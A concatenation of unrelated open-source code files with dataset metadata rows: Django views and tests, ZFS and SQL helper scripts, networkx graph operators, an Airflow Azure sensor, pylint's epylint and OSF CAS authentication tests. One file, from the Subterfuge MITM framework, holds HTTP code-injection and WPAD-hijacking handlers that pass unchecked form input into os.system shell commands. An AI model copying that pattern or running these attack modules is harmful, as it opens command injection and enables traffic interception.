# delete stream
stream_info.delete()
stream_info = None
messages.append('Your stream link was deleted.')
form = AddStreamForm()
else:
form = AddStreamForm(instance=stream_info) # An unbound form
ctx = RequestContext(request, {'form': form,
'messages': messages,
'edit': stream_info is not None})
return render_to_response('streams/register_stream.html', ctx)
def list_streams(request):
online_streams = StreamInfo.objects.filter(online=True).order_by('-viewers')
offline_streams = StreamInfo.objects.filter(online=False)
return render_to_response('streams/list_streams.html', {'online_streams': online_streams,
'offline_streams': offline_streams}) | mit | -1,552,262,692,296,011,000 | 44.780488 | 97 | 0.615139 | false |
ISKU/BOJ-AutoCommit | option.py | 1 | 4258 | DEFAULT_COMMIT_MESSAGE = 'BOJ #[NO]'
DEFAULT_DIR_NAME = '[NO]'
DEFAULT_POLL = 600
DEFAULT_SOURCE_NAME = '[NO]'
class Option:
def __init__(self, option):
self.option = option
def commit_message(self, problem):
if not 'commit_message' in self.option:
return self.replace_msg(DEFAULT_COMMIT_MESSAGE, problem)
return self.replace_msg(self.option['commit_message'], problem)
def source_tree(self, problem, repo_name):
if not 'source_tree' in self.option:
if self.mkdir():
return '%s/%s' % (repo_name, self.dir_name(problem))
return '%s' % self.repo_name
if self.option['source_tree'][-1] == '/':
if self.mkdir():
return '%s%s' % (self.option['source_tree'], self.dir_name(problem))
return '%s' % self.option['source_tree'][:-1]
if self.mkdir():
return '%s/%s' % (self.option['source_tree'], self.dir_name(problem))
return '%s' % self.option['source_tree']
def dir_name(self, problem):
if not 'dir_name' in self.option:
return self.replace_msg(DEFAULT_DIR_NAME, problem)
return self.replace_msg(self.option['dir_name'], problem)
def mkdir(self):
if not 'mkdir' in self.option:
return True
return self.option['mkdir']
def private(self):
if not 'private' in self.option:
return False
return self.option['private']
def poll(self):
if not 'poll' in self.option:
return DEFAULT_POLL
return self.option['poll']
def source_name(self, problem):
if not 'source_name' in self.option:
return self.replace_msg(DEFAULT_SOURCE_NAME, problem)
return self.replace_msg(self.option['source_name'], problem)
def lang(self, problem):
if not 'lang' in self.option:
return False, None
if problem['language'] != self.option['lang']:
return True, False
return True, True
def replace_msg(self, msg, problem):
msg = msg.replace('[NO]', problem['problem_id'])
msg = msg.replace('[TITLE]', problem['problem_title'])
return msg
def get_ext(self, language):
extensions = {
'C': '.c',
'C++': '.cpp',
'C++11': '.cpp',
'C++14': '.cpp',
'C++17': '.cpp',
'Java': '.java',
'Java (OpenJDK)': '.java',
'C11': '.c',
'Python 2': '.py',
'Python 3': '.py',
'PyPy2': '.py',
'PyPy3': '.py',
'Ruby2.5': '.rb',
'Kotlin': '.kt',
'Swift': '.swift',
'C# 6.0': '.cs',
'Text': '.txt',
'node.js': 'js',
'Go': '.go',
'F#': '.fs',
'PHP': '.php',
'Pascal': '.pas',
'Lua': '.lua',
'Perl': '.pl',
'Objective-C': '.m',
'Objective-C++': '.mm',
'C (Clang)': '.c',
'C++11 (Clang)': '.cpp',
'C++14 (Clang)': '.cpp',
'C++17 (Clang)': '.cpp',
'Golfscript': '.gs',
'Bash': '.sh',
'Fortran': '.f95',
'Scheme': '.scm',
'Ada': '.ada',
'awk': '.awk',
'OCaml': '.ml',
'Brainfuck': '.bf',
'Whitespace': '.ws',
'Tcl': '.tcl',
'Assembly (32bit)': '.asm',
'Assembly (32bit)': '.asm',
'D': '.d',
'Clojure': '.clj',
'Rhino': '.js',
'Cobol': '.cob',
'SpiderMonkey': '.js',
'Pike': '.pike',
'sed': '.sed',
'Rust': '.rs',
'Boo': '.boo',
'Intercal': '.i',
'bc': '.bc',
'Nemerle': '.n',
'Cobra': '.cobra',
'Algol 68': '.a68',
'Befunge': '.bf',
'Haxe': '.hx',
'LOLCODE': '.lol',
'VB.NET 4.0': '.vb',
'아희': '.aheui'
}
if not language in extensions:
return True, 'Unknown language'
return False, extensions[language]
| mit | -229,388,674,643,249,000 | 28.748252 | 84 | 0.443112 | false |
libretees/libreshop | libreshop/common/tests/test_UniqueTogetherFormSet.py | 1 | 3653 | from django.core.exceptions import ValidationError
from django.forms.models import inlineformset_factory
from django.test import TestCase
from ..forms.models import UniqueTogetherFormSet
from ..models import Inventory, Location, Warehouse
# Create your tests here.
class UniqueTogetherFormSetTest(TestCase):
def setUp(self):
self.post_data = {
'location_set-INITIAL_FORMS': '0',
'location_set-TOTAL_FORMS': '2',
'location_set-0-id': '',
'location_set-0-inventory': '',
'location_set-0-quantity': '',
# 'location_set-0-warehouse': '1',
'location_set-1-id': '',
'location_set-1-inventory': '',
'location_set-1-quantity': '',
# 'location_set-1-warehouse': '1',
}
def test_formset_raises_exception_for_duplicate_values_in_intermediate_model(self):
'''
Test that UniqueTogetherFormSet raises an exception when duplicate
values exist for an intermediate model's Meta.unique_together field.
'''
warehouse = Warehouse.objects.create(name='foo')
self.post_data.update({
'location_set-0-warehouse': warehouse.pk,
'location_set-1-warehouse': warehouse.pk,
})
FormSet = inlineformset_factory(
Inventory, Location, formset=UniqueTogetherFormSet,
fields=('inventory', 'warehouse')
)
formset = FormSet(data=self.post_data)
self.assertRaises(ValidationError, formset.clean)
def test_formset_is_valid_for_unique_values(self):
'''
Test that UniqueTogetherFormSet is valid when no duplicate values exist
for an intermediate model's Meta.unique_together field.
'''
warehouse1 = Warehouse.objects.create(name='foo')
warehouse2 = Warehouse.objects.create(name='bar')
self.post_data.update({
'location_set-0-warehouse': warehouse1.pk,
'location_set-1-warehouse': warehouse2.pk,
})
FormSet = inlineformset_factory(
Inventory, Location, formset=UniqueTogetherFormSet,
fields=('inventory', 'warehouse')
)
formset = FormSet(data=self.post_data)
self.assertTrue(formset.is_valid())
def test_formset_is_invalid_for_duplicate_values(self):
'''
Test that UniqueTogetherFormSet is invalid when duplicate values exist
for an intermediate model's Meta.unique_together field.
'''
warehouse = Warehouse.objects.create(name='foo')
self.post_data.update({
'location_set-0-warehouse': warehouse.pk,
'location_set-1-warehouse': warehouse.pk,
})
FormSet = inlineformset_factory(
Inventory, Location, formset=UniqueTogetherFormSet,
fields=('inventory', 'warehouse')
)
formset = FormSet(data=self.post_data)
self.assertFalse(formset.is_valid())
def test_formset_handles_null_values(self):
'''
Test that UniqueTogetherFormSet does not raise a KeyError exception if a
NULL value is specified within the FormSet.
'''
warehouse = Warehouse.objects.create(name='foo')
self.post_data.update({
'location_set-0-warehouse': warehouse.pk,
'location_set-1-warehouse': None,
})
FormSet = inlineformset_factory(
Inventory, Location, formset=UniqueTogetherFormSet,
fields=('inventory', 'warehouse')
)
formset = FormSet(data=self.post_data)
self.assertTrue(formset.is_valid())
| gpl-3.0 | 7,416,644,987,825,297,000 | 31.90991 | 87 | 0.61648 | false |
M-Carter/zettaknight | zk_import.py | 1 | 3525 | #!/usr/bin/python
import yaml
import json
import six
import logging
from zk_utils import spawn_job
#open logging instance
logger = logging.getLogger(__name__)
class ZkBase(object):
def __init__(self):
pass
def conv_str_to_dict(self, string):
'''
takes a console output and breaks each line on a newline, then
creates a formatted dictionary out of the first three columns
ouput_dict['column1']['column2'] = 'column3'
'''
logger.debug('converting string input to a usable dictionary...')
assert isinstance(string, str) and string is not None, 'conv_str_to_dict requires a string'
ret = {}
for line in string.split('\n'):
#create a list from string
line = line.split()
if line:
name_ = line[0]
key_ = line[1]
value_ = line[2]
#create the key if it doesn't exist
if name_ not in ret:
ret[name_] = {}
ret[name_][key_] = value_
return ret
class ZkDatasets(ZkBase):
def __init__(self):
self.live_datasets = None
self.defined_datasets = None
def get_all_live_datasets(self):
'''function runs a zfs get all and returns a string output'''
dataset_configs = spawn_job('zfs get all -H')
return dataset_configs
def live_datasets(self):
'''
takes the output from get_all_live_datasets and creates a usable dictionary
format will be dictionary['dataset']['zfs attribute'] = value
'''
dataset_configs = self.get_all_live_datasets()
return super(ZkDatasets, self).conv_str_to_dict(dataset_configs)
class ZkZpools(ZkBase):
def __init__(self):
self.live_zpools = None
self.defined_zpools = None
def get_all_live_zpools(self):
'''function runs a zpool get all and returns a string output'''
logger.debug('generating zpool get all statement...')
zpool_configs = spawn_job('zpool get all -H')
return zpool_configs
def get_live_zpools(self):
'''
takes the output from get_all_live_zpools and creates a usable dictionary
format will be dictionary['pool name']['zfs attribute'] = value
'''
logger.debug('retrieving live zpool information...')
zpool_configs = self.get_all_live_zpools()
zpool_dict = super(ZkZpools, self).conv_str_to_dict(zpool_configs)
return zpool_dict
def get_defined_zpools(self, file):
'''open the zettaknight zpool configuration file and converts to a usable dictionary'''
logger.debug('retrieving zettaknight zpools from {0}...'.format(file))
assert file is not None
with open(file, 'r') as f:
conff = yaml.safe_load(f)
return conff
class ZkZettaknight:
def __init__(self):
pass
def get_zettaknight_config(self, file):
'''open the zettaknight configuration file and converts to a usable dictionary'''
logger.debug('retrieving zettaknight configuration from {0}...'.format(file))
assert file is not None
with open(file, 'r') as f:
conff = yaml.safe_load(f)
return conff
| gpl-3.0 | 1,426,781,401,315,458,000 | 27.658537 | 99 | 0.560567 | false |
pfschwartz/openelisglobal-core | liquibase/OE2.9/testCatalogHT_Clinical/scripts/testResult.py | 6 | 3274 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def convert_type_to_symbole( type):
if type == 'Numeric' or type == 'numeric' :
return 'N'
if 'Free Text' in type:
return 'R'
if type == 'Select list':
return 'D'
if type == 'multi' or type == 'Multi Select':
return 'M'
return type
def esc_char(name):
if "'" in name:
return "$$" + name + "$$"
else:
return "'" + name + "'"
def get_split_names( name ):
split_name_list = name.split("/")
for i in range(0, len(split_name_list)):
split_name_list[i] = split_name_list[i].strip()
return split_name_list
def get_comma_split_names( name ):
split_name_list = [name]
if ',' in name:
split_name_list = name.split(",")
elif ';' in name:
split_name_list = name.split(";")
for i in range(0, len(split_name_list)):
split_name_list[i] = split_name_list[i].strip()
return split_name_list
test_names = []
sample_types = []
select = []
type = []
descriptions = []
name_file = open('testName.txt','r')
sample_type_file = open("sampleType.txt")
select_file = open("selectList.txt", 'r')
result_type_file = open("resultType.txt", 'r')
results = open("output/MassiveTestResults.sql", 'w')
for line in name_file:
test_names.append(line.strip())
name_file.close()
for line in sample_type_file:
sample_types.append(line.strip())
sample_type_file.close()
for line in select_file:
select.append(line.strip())
select_file.close()
for line in result_type_file:
type.append( line.strip())
result_type_file.close()
nextVal = " VALUES ( nextval( 'test_result_seq' ) "
order = 10
for row in range(0, len(test_names)):
if len(test_names[row]) > 1: #it's a new entry
result_type = convert_type_to_symbole(type[row])
description = esc_char(test_names[row] + "(" + sample_types[row] + ")")
if description not in descriptions:
descriptions.append(description)
if result_type == 'D' or result_type == 'M':
split_selections = get_comma_split_names( select[row])
for j in range(0, len(split_selections)):
dictionary_select = " ( select max(id) from clinlims.dictionary where dict_entry =" + esc_char(split_selections[j].strip()) + " ) "
results.write("INSERT INTO test_result( id, test_id, tst_rslt_type, value , lastupdated, sort_order)\n\t")
results.write( nextVal + ", ( select id from clinlims.test where description = " + description + " ) , '")
results.write( result_type + "' , " + dictionary_select + " , now() , " + str(order) + ");\n")
order += 10
else:
results.write("INSERT INTO test_result( id, test_id, tst_rslt_type, value , lastupdated, sort_order)\n\t")
results.write( nextVal + ", ( select id from clinlims.test where description = " + description + " ) , '")
results.write( result_type + "' , null , now() , " + str(order) + ");\n")
order += 10
print "Done results in MassiveTestResults.sql" | mpl-2.0 | -3,478,365,595,080,684,500 | 30.76 | 151 | 0.558338 | false |
thisisALPINE/subterfuge | modules/views.py | 21 | 6546 | import os
#Django Web Modules
from django.template import Context, loader
from django.http import HttpResponse
from django.http import HttpRequest
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.cache import never_cache
from django.template import RequestContext
#Database Models
from subterfuge.main.models import credentials
from subterfuge.modules.models import *
#Additional Views
from subterfuge.cease.views import *
from subterfuge.modules.views import *
# Subterfuge Module Builder
def build(request, modname, description):
#Create Module Directory
os.system('mkdir ' + str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'modules/' + modname + '/')
#Read Default .mods
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'templates/mods/default.mod', 'r') as file:
default = file.readlines()
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'templates/mods/default_settings.mod', 'r') as file:
defaultsettings = file.readlines()
print defaultsettings
#Format for new Module
default[2] = "$('#pluginconfigbox" + modname + "').hide();\n"
default[7] = "function show" + modname + "config()\n"
default[11] = "$('#pluginconfigbox" + modname + "').fadeIn(1000).show();\n"
default[16] = "<a href = '#" + modname + "'>\n"
default[17] = "<div onclick = 'show" + modname + "config()' id = 'plugin' name = '{{plugin}}'>\n"
default[18] = "<img src = '/static/images/plugins/" + modname + ".png'><br>\n"
default[19] = modname
defaultsettings[0] = "<div id = 'pluginconfigbox" + modname + "'>\n"
defaultsettings[1] = description
defaultsettings[2] = "<a href = '/" + modname + "/' name = 'pset'><div id = 'redbutton' style = 'margin-top: 385px; color: white;'>Start</div></a>\n"
#Write .mod files
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'templates/mods/' + modname + '.mod', 'w') as file:
file.writelines(default)
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'templates/mods/' + modname + '_settings.mod', 'w') as file:
file.writelines(defaultsettings)
#Add Module to database
newmod = installed(name = modname)
newmod.save()
# Subterfuge Module Builder
def create(request):
#Module Name
modname = str(request.POST['modname']).strip(" ")
des = ""
#Module Description
try:
description = request.FILES['description']
for chunk in description.chunks():
des = chunk
except:
print "No GUI Description"
#Create Module Space
build(request, modname, des)
#Get/Write Files
if request.FILES['modicon']:
icon = request.FILES['modicon']
dest = open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'templates/images/plugins/' + modname + '.png', 'wb+')
for chunk in icon.chunks():
dest.write(chunk)
dest.close()
if request.FILES['exploitcode']:
exploitcode = request.FILES['exploitcode']
dest = open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'modules/' + modname + '/' + modname + '.py', 'wb+')
for chunk in exploitcode.chunks():
dest.write(chunk)
dest.close()
#Relay Template Variables
return render_to_response("home.ext", {
"status" : "on",
})
#################################
#Subterfuge Modules Section
#################################
def builder(request):
# Read in subterfuge.conf
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'subterfuge.conf', 'r') as file:
conf = file.readlines()
#Relay Template Variables
return render_to_response("mod.ext", {
"conf" : str(conf[20]).rstrip('\n'),
"module_name" : request.META['PATH_INFO'].rstrip('/').strip('/'),
"module_page" : "mods/" + request.META['PATH_INFO'].rstrip('/').strip('/') + "_page.mod"
})
#################################
#HTTP CODE INJECTION MOD
#################################
def httpcodeinjection(request, conf):
# HTTP CODE INJECTION MODULE CONFIGURATION
exploit = ""
payload = ""
ip = ""
port = "8080"
# Status
status = request.POST["status"]
# Exploit
if request.POST["iexploit"]:
exploit = request.POST["iexploit"]
# Payload
if request.POST["payload"]:
payload = request.POST["payload"]
# Options
# Custom Inject
if request.POST["custominject"]:
exploit = "custom"
# Write Custom Inject into File
with open(str(os.path.dirname(__file__)) + '/httpcodeinjection/inject.x', 'w') as file:
file.writelines(request.POST["custominject"])
# Determine Metasploit Usage
if request.POST["start-msf"]:
msf = request.POST["start-msf"] + "\n"
# Check IP/PORT
if request.POST["inject-ip"]:
ip = request.POST["inject-ip"]
if request.POST["inject-port"]:
port = request.POST["inject-port"]
# Update Inject Status
installed.objects.filter(name = "httpcodeinjection").update(active = status)
# Execute
os.system('python ' + str(os.path.dirname(os.path.abspath(__file__))) + '/httpcodeinjection/httpcodeinjection.py ' + exploit + ' ' + payload + " " + ip + " " + port)
# Execute
#os.system('xterm -e sh -c "python ' + str(os.path.dirname(os.path.abspath(__file__))) + '/httpcodeinjection/httpcodeinjection.py ' + method + ' ' + payload + '" &')
#################################
#TUNNEL BLOCK MODULE
#################################
def tunnelblock():
os.system('python ' + str(os.path.dirname(os.path.abspath(__file__))) + '/TunnelBlock/TunnelBlock.py')
#################################
#WPAD Hijacking
#################################
def wpad(request):
# Read in subterfuge.conf
with open(str(os.path.dirname(__file__)).rstrip("abcdefghijklmnnnopqrstruvwxyz") + 'subterfuge.conf', 'r') as file:
conf = file.readlines()
#Relay Template Variables
return render_to_response("wpad.dat", {
"na" : "na"
})
| gpl-3.0 | -4,396,786,117,080,553,000 | 33.634921 | 169 | 0.602047 | false |
DougFirErickson/qgisSpaceSyntaxToolkit | esstoolkit/external/networkx/algorithms/operators/all.py | 11 | 4215 | """Operations on many graphs.
"""
# Copyright (C) 2013 by
# Aric Hagberg <[email protected]>
# Dan Schult <[email protected]>
# Pieter Swart <[email protected]>
# All rights reserved.
# BSD license.
try:
from itertools import izip_longest as zip_longest
except ImportError: # Python3 has zip_longest
from itertools import zip_longest
import networkx as nx
#from networkx.utils import is_string_like
__author__ = """\n""".join([ 'Robert King <[email protected]>',
'Aric Hagberg <[email protected]>'])
__all__ = ['union_all', 'compose_all', 'disjoint_union_all',
'intersection_all']
def union_all(graphs, rename=(None,) , name=None):
"""Return the union of all graphs.
The graphs must be disjoint, otherwise an exception is raised.
Parameters
----------
graphs : list of graphs
List of NetworkX graphs
rename : bool , default=(None, None)
Node names of G and H can be changed by specifying the tuple
rename=('G-','H-') (for example). Node "u" in G is then renamed
"G-u" and "v" in H is renamed "H-v".
name : string
Specify the name for the union graph@not_implemnted_for('direct
Returns
-------
U : a graph with the same type as the first graph in list
Notes
-----
To force a disjoint union with node relabeling, use
disjoint_union_all(G,H) or convert_node_labels_to integers().
Graph, edge, and node attributes are propagated to the union graph.
If a graph attribute is present in multiple graphs, then the value
from the last graph in the list with that attribute is used.
See Also
--------
union
disjoint_union_all
"""
graphs_names = zip_longest(graphs, rename)
U, gname = next(graphs_names)
for H, hname in graphs_names:
U = nx.union(U, H, (gname, hname), name=name)
gname = None
return U
def disjoint_union_all(graphs):
"""Return the disjoint union of all graphs.
This operation forces distinct integer node labels starting with 0
for the first graph in the list and numbering consecutively.
Parameters
----------
graphs : list
List of NetworkX graphs
Returns
-------
U : A graph with the same type as the first graph in list
Notes
-----
It is recommended that the graphs be either all directed or all undirected.
Graph, edge, and node attributes are propagated to the union graph.
If a graph attribute is present in multiple graphs, then the value
from the last graph in the list with that attribute is used.
"""
graphs = iter(graphs)
U = next(graphs)
for H in graphs:
U = nx.disjoint_union(U, H)
return U
def compose_all(graphs, name=None):
"""Return the composition of all graphs.
Composition is the simple union of the node sets and edge sets.
The node sets of the supplied graphs need not be disjoint.
Parameters
----------
graphs : list
List of NetworkX graphs
name : string
Specify name for new graph
Returns
-------
C : A graph with the same type as the first graph in list
Notes
-----
It is recommended that the supplied graphs be either all directed or all
undirected.
Graph, edge, and node attributes are propagated to the union graph.
If a graph attribute is present in multiple graphs, then the value
from the last graph in the list with that attribute is used.
"""
graphs = iter(graphs)
C = next(graphs)
for H in graphs:
C = nx.compose(C, H, name=name)
return C
def intersection_all(graphs):
"""Return a new graph that contains only the edges that exist in
all graphs.
All supplied graphs must have the same node set.
Parameters
----------
graphs_list : list
List of NetworkX graphs
Returns
-------
R : A new graph with the same type as the first graph in list
Notes
-----
Attributes from the graph, nodes, and edges are not copied to the new
graph.
"""
graphs = iter(graphs)
R = next(graphs)
for H in graphs:
R = nx.intersection(R, H)
return R
| gpl-3.0 | 9,105,696,972,748,943,000 | 26.913907 | 79 | 0.638909 | false |
Tagar/incubator-airflow | airflow/contrib/sensors/wasb_sensor.py | 3 | 3696 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from airflow.contrib.hooks.wasb_hook import WasbHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
class WasbBlobSensor(BaseSensorOperator):
"""
Waits for a blob to arrive on Azure Blob Storage.
:param container_name: Name of the container.
:type container_name: str
:param blob_name: Name of the blob.
:type blob_name: str
:param wasb_conn_id: Reference to the wasb connection.
:type wasb_conn_id: str
:param check_options: Optional keyword arguments that
`WasbHook.check_for_blob()` takes.
:type check_options: dict
"""
template_fields = ('container_name', 'blob_name')
@apply_defaults
def __init__(self, container_name, blob_name,
wasb_conn_id='wasb_default', check_options=None, *args,
**kwargs):
super(WasbBlobSensor, self).__init__(*args, **kwargs)
if check_options is None:
check_options = {}
self.wasb_conn_id = wasb_conn_id
self.container_name = container_name
self.blob_name = blob_name
self.check_options = check_options
def poke(self, context):
self.log.info(
'Poking for blob: {self.blob_name}\n'
'in wasb://{self.container_name}'.format(**locals())
)
hook = WasbHook(wasb_conn_id=self.wasb_conn_id)
return hook.check_for_blob(self.container_name, self.blob_name,
**self.check_options)
class WasbPrefixSensor(BaseSensorOperator):
"""
Waits for blobs matching a prefix to arrive on Azure Blob Storage.
:param container_name: Name of the container.
:type container_name: str
:param prefix: Prefix of the blob.
:type prefix: str
:param wasb_conn_id: Reference to the wasb connection.
:type wasb_conn_id: str
:param check_options: Optional keyword arguments that
`WasbHook.check_for_prefix()` takes.
:type check_options: dict
"""
template_fields = ('container_name', 'prefix')
@apply_defaults
def __init__(self, container_name, prefix, wasb_conn_id='wasb_default',
check_options=None, *args, **kwargs):
super(WasbPrefixSensor, self).__init__(*args, **kwargs)
if check_options is None:
check_options = {}
self.wasb_conn_id = wasb_conn_id
self.container_name = container_name
self.prefix = prefix
self.check_options = check_options
def poke(self, context):
self.log.info(
'Poking for prefix: {self.prefix}\n'
'in wasb://{self.container_name}'.format(**locals())
)
hook = WasbHook(wasb_conn_id=self.wasb_conn_id)
return hook.check_for_prefix(self.container_name, self.prefix,
**self.check_options)
| apache-2.0 | 7,009,662,320,566,134,000 | 36.333333 | 75 | 0.650974 | false |
gkarlin/django-jenkins | build/pylint/epylint.py | 3 | 6363 | # -*- coding: utf-8; mode: python; tab-width: 4; indent-tabs-mode: nil; c-basic-offset: 4 -*- vim:fenc=utf-8:ft=python:et:sw=4:ts=4:sts=4
# Copyright (c) 2003-2012 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:[email protected]
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""Emacs and Flymake compatible Pylint.
This script is for integration with emacs and is compatible with flymake mode.
epylint walks out of python packages before invoking pylint. This avoids
reporting import errors that occur when a module within a package uses the
absolute import path to get another module within this package.
For example:
- Suppose a package is structured as
a/__init__.py
a/b/x.py
a/c/y.py
- Then if y.py imports x as "from a.b import x" the following produces pylint errors
cd a/c; pylint y.py
- The following obviously doesn't
pylint a/c/y.py
- As this script will be invoked by emacs within the directory of the file
we are checking we need to go out of it to avoid these false positives.
You may also use py_run to run pylint with desired options and get back (or not) its output.
"""
import sys, os, re
from subprocess import Popen, PIPE
def lint(filename):
"""Pylint the given file.
When run from emacs we will be in the directory of a file, and passed its filename.
If this file is part of a package and is trying to import other modules from within
its own package or another package rooted in a directory below it, pylint will classify
it as a failed import.
To get around this, we traverse down the directory tree to find the root of the package this
module is in. We then invoke pylint from this directory.
Finally, we must correct the filenames in the output generated by pylint so Emacs doesn't
become confused (it will expect just the original filename, while pylint may extend it with
extra directories if we've traversed down the tree)
"""
# traverse downwards until we are out of a python package
fullPath = os.path.abspath(filename)
parentPath, childPath = os.path.dirname(fullPath), os.path.basename(fullPath)
while parentPath != "/" and os.path.exists(os.path.join(parentPath, '__init__.py')):
childPath = os.path.join(os.path.basename(parentPath), childPath)
parentPath = os.path.dirname(parentPath)
# Start pylint
# Ensure we use the python and pylint associated with the running epylint
lintPath = os.path.join(os.path.dirname(__file__), 'lint.py')
cmd = [sys.executable, lintPath, '-f', 'parseable', '-r', 'n',
'--disable=C,R,I', childPath]
process = Popen(cmd, stdout=PIPE, stderr=PIPE, cwd=parentPath)
# The parseable line format is '%(path)s:%(line)s: [%(sigle)s%(obj)s] %(msg)s'
# NOTE: This would be cleaner if we added an Emacs reporter to pylint.reporters.text ..
regex = re.compile(r"\[(?P<type>[WE])(?P<remainder>.*?)\]")
def _replacement(mObj):
"Alter to include 'Error' or 'Warning'"
if mObj.group("type") == "W":
replacement = "Warning"
else:
replacement = "Error"
# replace as "Warning (W0511, funcName): Warning Text"
return "%s (%s%s):" % (replacement, mObj.group("type"), mObj.group("remainder"))
for line in process.stdout:
# remove pylintrc warning
if line.startswith("No config file found"):
continue
line = regex.sub(_replacement, line, 1)
# modify the file name thats output to reverse the path traversal we made
parts = line.split(":")
if parts and parts[0] == childPath:
line = ":".join([filename] + parts[1:])
print line,
process.wait()
return process.returncode
def py_run(command_options='', return_std=False, stdout=None, stderr=None,
script='epylint'):
"""Run pylint from python (needs Python >= 2.4).
``command_options`` is a string containing ``pylint`` command line options;
``return_std`` (boolean) indicates return of created standart output
and error (see below);
``stdout`` and ``stderr`` are 'file-like' objects in which standart output
could be written.
Calling agent is responsible for stdout/err management (creation, close).
Default standart output and error are those from sys,
or standalone ones (``subprocess.PIPE``) are used
if they are not set and ``return_std``.
If ``return_std`` is set to ``True``, this function returns a 2-uple
containing standart output and error related to created process,
as follows: ``(stdout, stderr)``.
A trivial usage could be as follows:
>>> py_run( '--version')
No config file found, using default configuration
pylint 0.18.1,
...
To silently run Pylint on a module, and get its standart output and error:
>>> (pylint_stdout, pylint_stderr) = py_run( 'module_name.py', True)
"""
# Create command line to call pylint
if os.name == 'nt':
script += '.bat'
command_line = script + ' ' + command_options
# Providing standart output and/or error if not set
if stdout is None:
if return_std:
stdout = PIPE
else:
stdout = sys.stdout
if stderr is None:
if return_std:
stderr = PIPE
else:
stderr = sys.stderr
# Call pylint in a subprocess
p = Popen(command_line, shell=True, stdout=stdout, stderr=stderr)
p.wait()
# Return standart output and error
if return_std:
return (p.stdout, p.stderr)
def Run():
sys.exit(lint(sys.argv[1]))
if __name__ == '__main__':
Run()
| lgpl-3.0 | -1,224,322,329,500,459,000 | 37.563636 | 137 | 0.664938 | false |
brianjgeiger/osf.io | tests/test_cas_authentication.py | 4 | 14397 | # -*- coding: utf-8 -*-
import furl
import responses
import mock
from nose.tools import * # noqa: F403
import unittest
from framework.auth import cas
from tests.base import OsfTestCase, fake
from osf_tests.factories import UserFactory
def make_successful_response(user):
return cas.CasResponse(
authenticated=True,
user=user._id,
attributes={
'accessToken': fake.md5()
}
)
def make_failure_response():
return cas.CasResponse(
authenticated=False,
user=None,
)
def make_external_response(release=True, unicode=False):
attributes = {
'accessToken': fake.md5(),
}
if release:
attributes.update({
'given-names': fake.first_name() if not unicode else u'нет',
'family-name': fake.last_name() if not unicode else u'Да',
})
return cas.CasResponse(
authenticated=True,
user='OrcidProfile#{}'.format(fake.numerify('####-####-####-####')),
attributes=attributes
)
def generate_external_user_with_resp(service_url, user=True, release=True):
"""
Generate mock user, external credential and cas response for tests.
:param service_url: the service url
:param user: set to `False` if user does not exists
:param release: set to `False` if attributes are not released due to privacy settings
:return: existing user object or new user, valid external credential, valid cas response
"""
cas_resp = make_external_response(release=release)
validated_credentials = cas.validate_external_credential(cas_resp.user)
if user:
user = UserFactory.build()
user.external_identity = {
validated_credentials['provider']: {
validated_credentials['id']: 'VERIFIED'
}
}
user.save()
return user, validated_credentials, cas_resp
else:
user = {
'external_id_provider': validated_credentials['provider'],
'external_id': validated_credentials['id'],
'fullname': '',
'access_token': cas_resp.attributes['accessToken'],
'service_url': service_url,
}
return user, validated_credentials, cas_resp
RESPONSE_TEMPLATE = """
<cas:serviceResponse xmlns:cas='http://www.yale.edu/tp/cas'>
<cas:authenticationSuccess>
<cas:user>{user_id}</cas:user>
<cas:attributes>
<cas:isFromNewLogin>true</cas:isFromNewLogin>
<cas:authenticationDate>Tue May 19 02:20:19 UTC 2015</cas:authenticationDate>
<cas:givenName>{given_name}</cas:givenName>
<cas:familyName>{family_name}</cas:familyName>
<cas:longTermAuthenticationRequestTokenUsed>true</cas:longTermAuthenticationRequestTokenUsed>
<cas:accessToken>{access_token}</cas:accessToken>
<cas:username>{username}</cas:username>
</cas:attributes>
</cas:authenticationSuccess>
</cas:serviceResponse>
"""
def make_service_validation_response_body(user, access_token=None):
token = access_token or fake.md5()
return RESPONSE_TEMPLATE.format(
user_id=user._id,
given_name=user.given_name,
family_name=user.family_name,
username=user.username,
access_token=token
)
def test_parse_authorization_header():
token = fake.md5()
valid = 'Bearer {}'.format(token)
assert_equal(cas.parse_auth_header(valid), token)
missing_token = 'Bearer '
with assert_raises(cas.CasTokenError):
cas.parse_auth_header(missing_token)
class TestCASClient(OsfTestCase):
def setUp(self):
OsfTestCase.setUp(self)
self.base_url = 'http://accounts.test.test'
self.client = cas.CasClient(self.base_url)
@responses.activate
def test_service_validate(self):
user = UserFactory()
url = furl.furl(self.base_url)
url.path.segments.extend(('p3', 'serviceValidate',))
